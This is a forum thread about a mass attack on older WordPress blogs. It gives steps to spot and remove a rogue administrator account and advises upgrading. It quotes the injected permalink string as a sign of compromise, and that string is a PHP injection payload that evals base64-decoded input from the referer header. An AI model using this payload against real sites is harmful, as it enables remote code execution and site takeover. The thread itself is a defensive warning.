Wordpress Under Attack.. check your blog

[sOliver]

There has been a mass attack. A lot of wordpress blogs were hacked yesterday.. I think everyone should check their blogs now, because you might not even know that your blog is hacked.

Here's a quick guide how to find out if you have been hacked.

0. Look at your permalinks. If there is a string attached like the one below, you have been hacked:

/month/year/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

1. Go to your Wordpress Admin Site
2. Under "Users" -> "Authors & Users" you will find all users, click on "Administrators".
3. Pay attention closely. If you see another name there (for a second only) you might have been hacked. Verify the number of administrators at the top. Remember the name of the unknown admin. In my case it was something like "EarnestCummingham".

4. Go to your PHPMyAdmin site and open the table "wp_usermeta".
5. Locate "EarnestCummingham" or a user with "wp_user_level" = "10".
6. Delete the user
7. Upgrade your wordpress blog to 2.8.4 (secure)

How to make your blog even more secure?
8. Read the full article at WebmasterWeblog.com

I hope this helps some people.. maybe you have been hacked and don't even know it .. that kinda scares me. A lot of people will not notice this and the hackers will then get what they want .. simply disgusts me

 

[lpxxfaintxx]

Thanks for the warning. Reminds us how important keeping your software up-to-date is.

 

[whitebark]

This was from a worm attacking old versions. You should always update to new versions when possible to avoid such avoidable instances.

 

[jgalty]

Update Update and update again

 

[coltter]

if you has updated to the latest Wordpress version, it's quite enough.